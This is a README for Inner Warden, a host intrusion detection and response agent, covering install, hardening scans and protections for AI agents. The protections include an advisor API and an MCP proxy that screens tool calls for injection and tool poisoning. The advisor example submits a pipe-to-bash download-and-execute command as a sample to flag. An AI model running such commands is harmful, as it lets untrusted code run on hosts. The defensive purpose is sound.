```bash
innerwarden enable block-ip
innerwarden enable ssh-protection
innerwarden enable shell-audit # prompts for privacy consent
```
Community modules:
```bash
innerwarden module install <url> # SHA-256 verified
innerwarden module search <term> # search the registry
```
---
## Protecting AI agents
If you run an AI agent with access to a shell, files, API keys, MCP tools, or production-like infrastructure, Inner Warden gives it a supervisor outside the prompt.
There are three protection surfaces:
- **Advisor API** for agents or tools you can modify: ask Inner Warden before running a command or connecting to an IP.
- **MCP inspecting proxy** for tool servers: screen `tools/call` arguments, tool descriptions, and tool results inline.
- **Host-level verification** for connected agents: eBPF/audit signals show what actually executed even if the agent ignored advice.
For the current built-in agent module:
```bash
innerwarden enable openclaw-protection
```
This enables command monitoring and agent safety checks for supported local agents and custom tool runners. The command analyzer uses structural analysis (tree-sitter AST) and embedded Agent Threat Rules instead of simple regex. Download-and-execute pipelines, reverse shells, staged attacks, credential exfiltration, and obfuscated commands are caught before they become silent damage.
### Let your agent ask before acting
Inner Warden exposes an API that AI agents can query:
```bash
# "Is my server safe right now?"
curl -s http://localhost:8787/api/agent/security-context
# → {"threat_level": "low", "recommendation": "safe to proceed"}
# "Is this command safe to run?"
curl -s -X POST http://localhost:8787/api/advisor/check-command \
-H "Content-Type: application/json" \
-d '{"command": "curl https://example.com/setup.sh | bash"}'
# → {"risk_score": 40, "recommendation": "review", "signals": ["download_and_execute"]}
# "Is this IP safe to connect to?"
curl -s "http://localhost:8787/api/agent/check-ip?ip=203.0.113.10"
# → {"known_threat": true, "blocked": true, "recommendation": "avoid"}
```
Your agent calls `check-command` before executing. If the recommendation is `deny`, it stops or asks the operator. If it ignores the advice and runs anyway, the host layer can still detect the execution and escalate the incident.
**MCP inspecting proxy.** For agents that talk to MCP servers, wrap the server so every tool call and result is inspected inline — no agent code changes needed:
```bash
# Advisory (default): transparent pipe that alerts on threats
innerwarden agent proxy -- npx -y some-mcp-server
# Guard: block a dangerous tool call (credential leak, injection, ATR rule)
# with an isError denial; the call never reaches the server
innerwarden agent proxy --mode guard -- npx -y some-mcp-server
```
It parses the JSON-RPC stdio stream and screens `tools/call` arguments, `tools/list` descriptions (tool poisoning), and tool results (injected responses). `guard` mode returns a denial before the dangerous call reaches the real tool server.
See [AI Agent Protection docs](modules/openclaw-protection/docs/README.md) for the full integration guide.
---
## Hardening advisor
Scan your system and get actionable security recommendations without changing anything.
```
$ innerwarden system harden
✓ SSH
⚠ Password authentication is enabled [high]
→ Set 'PasswordAuthentication no' in /etc/ssh/sshd_config
⚠ Root login via SSH is permitted [high]
→ Set 'PermitRootLogin no' in /etc/ssh/sshd_config
✓ Firewall
✓ 2 check(s) passed
! Kernel
⚠ ICMP redirects accepted (MITM risk) [medium]
→ Run: sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
✓ Permissions
✓ 3 check(s) passed
! Updates
⚠ 3 security update(s) pending (8 total) [high]
→ Run: sudo apt update && sudo apt upgrade -y
✓ Docker
✓ 3 check(s) passed
✓ Services
✓ 2 check(s) passed
Score: 68/100 (Fair)
██████████████████████░░░░░░░░░
```
Checks SSH config, firewall, kernel params (ASLR, SYN cookies, IP forwarding), file permissions (SUID, world-writable), pending updates, Docker (privileged containers, socket), and exposed services. Advisory only, never applies changes.
---
## Live threat feed
See Inner Warden responding to real attacks in real time: [innerwarden.com/live](https://innerwarden.com/live)
The agent exposes public read-only endpoints for live monitoring:
```bash
# Last 20 incidents with decisions
curl https://live.innerwarden.com/api/live-feed
# Real-time SSE stream
curl https://live.innerwarden.com/api/live-feed/stream
```
---
## Scan advisor
Let your server tell you what it needs.
```
$ innerwarden system scan
sshd running → ssh-protection ESSENTIAL [NATIVE]
docker running → container-security RECOMMENDED [NATIVE]
nginx running → search-protection RECOMMENDED [NATIVE]
fail2ban running → fail2ban-integration RECOMMENDED [NATIVE]
Conflicts detected:
fail2ban-integration + abuseipdb-enrichment: both auto-block IPs; enable one
Activation sequence:
1. innerwarden enable block-ip
2. innerwarden enable ssh-protection
3. innerwarden enable fail2ban-integration
```
**NATIVE** = reads existing logs, zero external deps. **EXTERNAL** = requires separate tool install.
---
## Install
```bash
curl -fsSL https://innerwarden.com/install | sudo bash
```
No API key required. What the installer does:
- Creates a dedicated `innerwarden` service user
- Downloads sensor + agent + ctl binaries for your architecture (`x86_64` / `aarch64`)
- Verifies each binary's **SHA-256 sidecar** against the canonical release
- Verifies each binary's **Ed25519 signature** against the embedded release public key (requires `openssl >= 3.0`)
- Writes config to `/etc/innerwarden/`, creates the data directory
- Starts sensor + agent via systemd (Linux) or launchd (macOS)
- Safe posture: detection active, no response skills enabled, `dry_run = true`
The installer fail-closes for stable releases when signatures are missing or invalid. Override env vars exist for migration / air-gapped scenarios. See [Supply Chain Security](docs/supply-chain-security.md) for the manual verification recipe (`SHA256SUMS` + `.sig` + `gh attestation verify`), the active key fingerprint, and an honest list of what is and is not guaranteed.
With external integrations:
```bash
curl -fsSL https://innerwarden.com/install | sudo bash -s -- --with-integrations
```
Build from source:
```bash
INNERWARDEN_BUILD_FROM_SOURCE=1 curl -fsSL https://innerwarden.com/install | sudo bash
```
### Uninstall
```bash
sudo innerwarden uninstall # remove the software, keep config + data
sudo innerwarden uninstall --purge # also remove config, data, logs, and the user
sudo innerwarden uninstall --dry-run # preview exactly what would be removed
```
This stops every service (sensor, agent, supervisor, watchdog), removes the binaries, systemd units, embedded eBPF object, pinned BPF maps, sudoers drop-ins, and the firewall rules InnerWarden added. Config (`/etc/innerwarden`) and data (`/var/lib/innerwarden`) are kept by default so a reinstall keeps your history and license; `--purge` removes them too.
If the `innerwarden` binary is missing or broken, the installer can tear everything down the same way:
```bash
curl -fsSL https://innerwarden.com/install | sudo bash -s -- --uninstall # or --uninstall --purge
```
### Configure AI
AI triage is optional. Add it when you want confidence-scored decisions.
**OpenAI:**
```bash
# /etc/innerwarden/agent.env
OPENAI_API_KEY=sk-...
```
**Anthropic:**
```bash
# /etc/innerwarden/agent.env
ANTHROPIC_API_KEY=sk-ant-...
```
```toml
# /etc/innerwarden/agent.toml
[ai]
provider = "anthropic"
model = "claude-haiku-4-5-20251001"
```
**Ollama (local, no key):**
```bash
curl -fsSL https://ollama.ai/install.sh | sh && ollama pull llama3.2
```
```toml
# /etc/innerwarden/agent.toml
[ai]
enabled = true
provider = "ollama"
model = "llama3.2"
```
After changing config:
```bash
sudo systemctl restart innerwarden-agent # Linux
sudo launchctl kickstart -k system/com.innerwarden.agent # macOS
```
Run `innerwarden system doctor` to validate your provider.
### After install
```bash
innerwarden get status # verify services are running
innerwarden system doctor # diagnose issues with fix hints
innerwarden system test # inject a synthetic incident and verify the full pipeline responds
innerwarden list # see capabilities and modules
```
Enable response skills when ready:
```bash
innerwarden enable block-ip # IP blocking (ufw default, or iptables/nftables)
innerwarden enable sudo-protection # detect + respond to sudo abuse
innerwarden enable shell-audit # shell command trail via auditd
```
### Configure notifications
```bash
innerwarden config telegram # interactive wizard
innerwarden config slack # Slack webhook setup
innerwarden config web-push --subject mailto:you@example.com
innerwarden config webhook --url https://hooks.example.com/notify
innerwarden config test-alert # verify all channels
```
### Go live
After enabling skills, the responder is active but still in `dry_run = true`. When you trust the decisions:
```bash
innerwarden config responder --enable --dry-run false
```
### Updates
```bash
innerwarden upgrade # fetch + install latest (SHA-256 verified)
innerwarden upgrade --check # check without installing
```
### Useful commands
```bash
innerwarden get status # services + today's activity
innerwarden get incidents --days 2 # recent threats
innerwarden get decisions --action block_ip # what was blocked and why
innerwarden get report # daily security report
innerwarden stream # live event stream
innerwarden action block 203.0.113.10 # manual IP block
innerwarden action unblock 203.0.113.10 # remove block
innerwarden trust add --ip 10.0.0.0/8 # skip AI for trusted ranges
innerwarden trust add --user deploy # skip AI for trusted users
innerwarden config ai # interactive AI provider setup (12 providers)
innerwarden config responder --enable --dry-run false
innerwarden config telegram # notification setup
innerwarden config cloudflare --token YOUR_TOKEN # edge blocking
innerwarden system doctor # diagnostics with fix hints
innerwarden system harden # security hardening advisor
innerwarden system scan # detect + recommend modules
innerwarden system test # verify full pipeline end-to-end
innerwarden system backup # archive configs to tar.gz
innerwarden system navigator # export MITRE ATT&CK coverage map
innerwarden module install <url> # SHA-256 verified community modules
innerwarden agent scan # find known local agents and MCP configs
innerwarden agent connect # connect agents you want supervised
innerwarden agent proxy -- npx -y some-mcp-server # wrap an MCP server with inspection
```
---
## Supported environments
- **Linux**: Ubuntu 22.04+, any systemd-based distro. Full feature set with 45 eBPF kernel programs loaded (tracepoints, kprobes, LSM, XDP, raw_tracepoints), kill chain enforcement, wire-speed blocking.
- **macOS**: Ventura and later (launchd, pf firewall, unified log). Detection and response work fully, but eBPF kernel programs are Linux-only. macOS uses log-based collectors instead.
Pre-built binaries: `x86_64` and `aarch64` for both platforms.
---
## Build and test
```bash
make test # 8076 tests across the workspace
make build # debug build (sensor + agent + ctl)
make replay-qa # end-to-end integration test
```
Run locally:
```bash
make run-sensor # writes to ./data/
make run-agent # reads from ./data/
```
---
## FAQ
**Is this an EDR?**
No. It is a self-contained defence agent with bounded response skills and full audit trails. No cloud, no phone-home, runs entirely on your host.
**Does it block by default?**
No. Starts in observe-only mode. You enable response skills and disable dry-run when ready.
**Do I need an AI provider?**
No. Detection, logging, dashboard, and reports all work without AI. AI adds confidence-scored triage for autonomous response and is entirely optional.
**How is this different from Fail2ban?**
Fail2ban blocks IPs based on regex patterns. Inner Warden has 82 detectors, 45 eBPF kernel programs with kill chain enforcement, a collaborative defence mesh network, 10 response skills (including sudo suspension, process kill, container pause, honeypots, and traffic capture), twelve AI providers, 4-layer DDoS defence, Telegram bot, AbuseIPDB intelligence sharing, and a full investigation dashboard with MITRE ATT&CK mapping.
**How is this different from other HIDS tools?**
Most host intrusion detection systems only observe. They write alerts for a human to act on. Inner Warden observes AND blocks. LSM hooks stop reverse shells at the kernel's execve before the process runs. XDP drops attack traffic at wire speed. Kill chain detection blocks 7 generic exploit patterns without CVE signatures, catching zero-day exploits by behaviour rather than known hashes.
**Can I add custom detectors or skills?**
Yes. See [module authoring guide](https://github.com/InnerWarden/innerwarden/wiki/Module-Authoring).
---
## Disclaimer
> **Warning**
> Inner Warden is an **experimental** security agent that can **block IP addresses, kill processes, suspend user privileges, pause containers, and modify firewall rules** on your system. These are powerful, potentially disruptive actions. Read this document carefully before deploying. Always start in observe-only mode and review behavior before enabling automatic responses.
Inner Warden is provided as-is, without warranty. It is experimental software that interacts with your system's firewall, process table, and user permissions. Automated security responses carry inherent risk. A false positive can block a legitimate user or disrupt a production service.
**You are responsible for:**
- Testing thoroughly in observe/dry-run mode before enabling responses
- Configuring allowlists to protect trusted IPs, users, and services
- Monitoring the audit trail and adjusting thresholds for your environment
- Understanding the response skills you enable and their effects
The authors are not responsible for downtime, data loss, or service disruption caused by misconfiguration or false positives. Use good judgment and test in a staging environment first.
---
## Community & feedback
InnerWarden is built in the open and we are actively trying to grow the community around it. If you are running it (or thinking about it), we want to hear from you — the install on your box tells us more than any benchmark suite.
**Feedback we want, however small:**
- [**Open an issue**](https://github.com/InnerWarden/innerwarden/issues/new/choose) — install problem, false positive, surprising behaviour, missing detector, anything that did not match your expectation
- [**Start a discussion**](https://github.com/InnerWarden/innerwarden/discussions) — questions, ideas, sharing your config, "did anyone else see X?"
- [**Star the repo**](https://github.com/InnerWarden/innerwarden) if it is useful — visibility is how more security engineers find it
- **Quick survey:** [usage + pain points (60 sec)](https://github.com/InnerWarden/innerwarden/discussions/categories/feedback) — even one-liners help us prioritise
- **Email** for private feedback or security disclosures: see [SECURITY.md](SECURITY.md)
Tell us: what did you install it on (distro / kernel)? Did it catch anything real? What blocked you? What would make you trust it on a production box? No answer is too small.
## Contributing
We need more hands. Detector writers, integration authors, docs hackers, testers — every contribution moves the project forward.
- [**Contributing guide**](CONTRIBUTING.md) — local dev setup, PR checklist, code style
- [**Good first issues**](https://github.com/InnerWarden/innerwarden/labels/good%20first%20issue) — documentation, config flags, small features
- [**Help wanted**](https://github.com/InnerWarden/innerwarden/labels/help%20wanted) — new detectors, sinks, integrations, CLI commands
- [**Module authoring**](https://github.com/InnerWarden/innerwarden/wiki/Module-Authoring) — write a vertical security module (manifest + config + docs + tests)
- [**Integration recipes**](https://github.com/InnerWarden/innerwarden/wiki/Integration-Recipes) — declarative YAML to wire an external tool in minutes, no Rust required
New detectors, integration recipes, and module documentation are especially appreciated. If you have a specific use case (different distro, weird kernel, missing collector for your stack), open an issue and we will help you ship it.
---
## Links
- [Website](https://www.innerwarden.com)
- [Live attack feed](https://innerwarden.com/live) — real attacks against our prod box, in real time
- [Blog](https://innerwarden.com/blog)
- [Changelog](CHANGELOG.md)
- [Contributing](CONTRIBUTING.md)
- [Security policy](SECURITY.md)
- [Documentation](https://github.com/InnerWarden/innerwarden/wiki)
- [Module authoring](https://github.com/InnerWarden/innerwarden/wiki/Module-Authoring)
- [GitHub Discussions](https://github.com/InnerWarden/innerwarden/discussions) — questions, ideas, war stories
- [Report an issue](https://github.com/InnerWarden/innerwarden/issues/new/choose) — install problems, FPs, missing detectors
## License
Apache License 2.0. See [LICENSE](LICENSE).
Connection Info
You Might Also Like
everything-claude-code
Complete Claude Code configuration collection - agents, skills, hooks,...
markitdown
MarkItDown-MCP is a lightweight server for converting URIs to Markdown.
cc-switch
All-in-One Assistant for Claude Code, Codex & Gemini CLI across platforms.
servers
Model Context Protocol Servers
servers
Model Context Protocol Servers
Time
A Model Context Protocol server for time and timezone conversions.